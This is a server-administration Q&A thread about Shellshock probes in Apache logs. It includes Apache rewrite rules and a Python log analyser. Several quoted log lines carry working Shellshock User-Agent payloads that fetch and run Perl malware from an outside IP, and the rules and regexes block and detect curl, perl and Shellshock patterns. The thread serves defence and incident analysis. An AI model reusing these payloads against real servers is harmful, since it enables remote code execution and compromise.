Http-Status-Code-404

Apache 404 errors with "hello" as the URL

  • December 24, 2015

My web server emails me whenever a 404 error occurs (to help me find broken links). I usually only get the ordinary 404s, like http://www.example.com/administrator.

But lately I keep getting requests for http://www.example.com/hello. I seem to be getting them from all over the world.

185.63.188.120 - - [21/Dec/2015:08:35:54 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:08:35:55 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:16:17:11 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [21/Dec/2015:16:17:12 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
172.246.105.114 - - [22/Dec/2015:08:25:12 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
172.246.105.114 - - [22/Dec/2015:08:25:13 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
80.248.216.11 - - [22/Dec/2015:16:33:41 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/BASHSALAM;wget http://188.138.41.134/BASHSALAM -O /tmp/BASHSALAM;wget http://188.138.41.134/BASHSALAM;perl BASHSALAM;perl BASHSALAM;rm -rf /tmp/BASHSALAM*\""
80.248.216.11 - - [22/Dec/2015:16:33:42 -0500] "GET /hello HTTP/1.0" 403 1809 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/BASHSALAM;wget http://188.138.41.134/BASHSALAM -O /tmp/BASHSALAM;wget http://188.138.41.134/BASHSALAM;perl BASHSALAM;perl BASHSALAM;rm -rf /tmp/BASHSALAM*\""
185.63.188.120 - - [22/Dec/2015:22:12:45 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [22/Dec/2015:22:12:46 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
185.63.188.120 - - [23/Dec/2015:16:56:56 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/iod.exe;curl -O http://188.138.41.134/iod.exe;wget http://188.138.41.134/iod.exe;perl /tmp/iod.exe*;perl iod.exe;rm -rf /tmp/iod.exe*\""
185.63.188.120 - - [23/Dec/2015:16:56:57 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/iod.exe;curl -O http://188.138.41.134/iod.exe;wget http://188.138.41.134/iod.exe;perl /tmp/iod.exe*;perl iod.exe;rm -rf /tmp/iod.exe*\""

I realize this is a Shellshock attack attempt on my server (the server is patched).

My question is: how do I stop this kind of attack? Besides patching bash, what else should I be doing to harden my web server? Is anyone else seeing these in their Apache logs?

What I find very sneaky about the attackers is that using "hello" in their URL makes it very hard to find an answer on Google. You get a huge number of useless results.

If your system is up to date, you don't need to worry.

You can set up custom rules to prevent most web bot attacks; for example, here are mine:

# Block empty ("-" or missing) user agents and common scripted clients
RewriteCond %{HTTP_USER_AGENT} ^-?$|curl|perl|python [NC,OR]
# Block any method other than GET, HEAD or POST
RewriteCond %{REQUEST_METHOD} !^(GET|HEAD|POST)$ [OR]
# Block request URIs that do not start with / (proxy-style requests)
RewriteCond %{REQUEST_URI} !^/ [OR]
# Block a Referer that is present but does not start with http
RewriteCond %{HTTP_REFERER} "!^$|^http"
# If any condition above matched: respond 406 and stop rewriting (END needs Apache 2.4)
RewriteRule .* - [END,R=406]

It will block most attacks before the bots even get to test the vulnerability:

  • blocks empty or suspicious user agents
  • restricts requests to GET, HEAD and POST
  • blocks requests that do not start with / (if you are not using your server as a proxy, every request should start with /)
  • blocks requests with an invalid REFERER

I use code 406, but you can change it to any other code you like.

If you need more information about the exploit:
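As an added example (not part of the question or the answer above), the script below parses Apache combined-format log lines like the ones in the question, flags the Shellshock trigger in the User-Agent, extracts the hosts the payload would download its stage from (useful for egress blocking and for scoping an incident), and emulates the answer's four RewriteCond lines to show whether each request would have received a 406. The first two sample lines are copied from the question's log; the third is a constructed benign request on a documentation IP range. The function names `analyze`, `parse_line`, `rewrite_rule_blocks` and `attacker_ips` are chosen here and are not from the page.

```python
import re

# Apache "combined" log format. Quoted fields may contain \" escapes, which is
# exactly how the inner quotes of the Shellshock payload show up in the log.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# The Shellshock trigger: a bash function definition "() { :;};" followed by
# trailing commands, sent in a header that a CGI handler copies into bash's environment.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{\s*:;\s*\}\s*;')

# Emulation of the answer's four RewriteCond lines (they are ORed together).
UA_BLOCK_RE = re.compile(r'^-?$|curl|perl|python', re.IGNORECASE)  # [NC]
ALLOWED_METHODS = {"GET", "HEAD", "POST"}                            # no NC: case-sensitive
REFERER_OK_RE = re.compile(r'^$|^http')                               # the rule negates this


def rewrite_rule_blocks(method, uri, referer, ua):
    """True if the answer's RewriteRule would answer this request with 406."""
    return (
        UA_BLOCK_RE.search(ua) is not None
        or method not in ALLOWED_METHODS
        or not uri.startswith("/")
        or REFERER_OK_RE.search(referer) is None
    )


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    # Apache logs a missing header as "-"; mod_rewrite sees it as an empty string.
    d["referer"] = "" if d["referer"] == "-" else d["referer"]
    d["ua"] = "" if d["ua"] == "-" else d["ua"].replace('\\"', '"')
    d["status"] = int(d["status"])
    return d


def analyze(log_text):
    """Return one finding per non-empty log line."""
    findings = []
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        d = parse_line(line)
        if d is None:
            findings.append({"raw": line, "parsed": False})
            continue
        hit = SHELLSHOCK_RE.search(d["ua"]) is not None
        findings.append({
            "parsed": True,
            "ip": d["ip"],
            "status": d["status"],
            "uri": d["uri"],
            "shellshock": hit,
            # Hosts the payload would fetch from: candidates for egress blocking.
            "payload_hosts": sorted(set(re.findall(r'https?://([\w.\-]+)', d["ua"]))) if hit else [],
            "would_be_blocked": rewrite_rule_blocks(d["method"], d["uri"], d["referer"], d["ua"]),
        })
    return findings


def attacker_ips(findings):
    """Sorted, de-duplicated source IPs that sent a Shellshock probe."""
    return sorted({f["ip"] for f in findings if f.get("shellshock")})


# Sample input: lines 1-2 copied from the question's log, line 3 constructed (203.0.113.0/24 is TEST-NET-3).
SAMPLE_LOG = r'''
185.63.188.120 - - [21/Dec/2015:08:35:54 -0500] "GET /hello HTTP/1.0" 301 328 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/GNUFISH;curl -O http://188.138.41.134/GNUFISH;wget http://188.138.41.134/GNUFISH;perl /tmp/GNUFISH*;perl GNUFISH;rm -rf /tmp/GNUFISH*\""
172.246.105.114 - - [22/Dec/2015:08:25:13 -0500] "GET /hello HTTP/1.0" 404 1806 "-" "() { :;}; /bin/bash -c \"cd /tmp;lwp-download -a http://188.138.41.134/cax;curl -O http://188.138.41.134/cax;wget http://188.138.41.134/cax;perl /tmp/cax*;perl cax;rm -rf /tmp/cax*\""
203.0.113.7 - - [24/Dec/2015:10:00:00 -0500] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/42.0"
'''

if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for f in results:
        print(f)
    print("Shellshock sources:", attacker_ips(results))
```

Note that the answer's rule catches these particular probes only because their User-Agent happens to contain "curl" and "perl"; a payload built around a different downloader would pass all four conditions, so the rule is a noise filter, not the fix. The 301/404 responses in the log show the request never reached a CGI script, and a patched bash ignores the trailing commands anyway, which is why the answer starts with "if your system is up to date".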

Quoted from: https://serverfault.com/questions/745160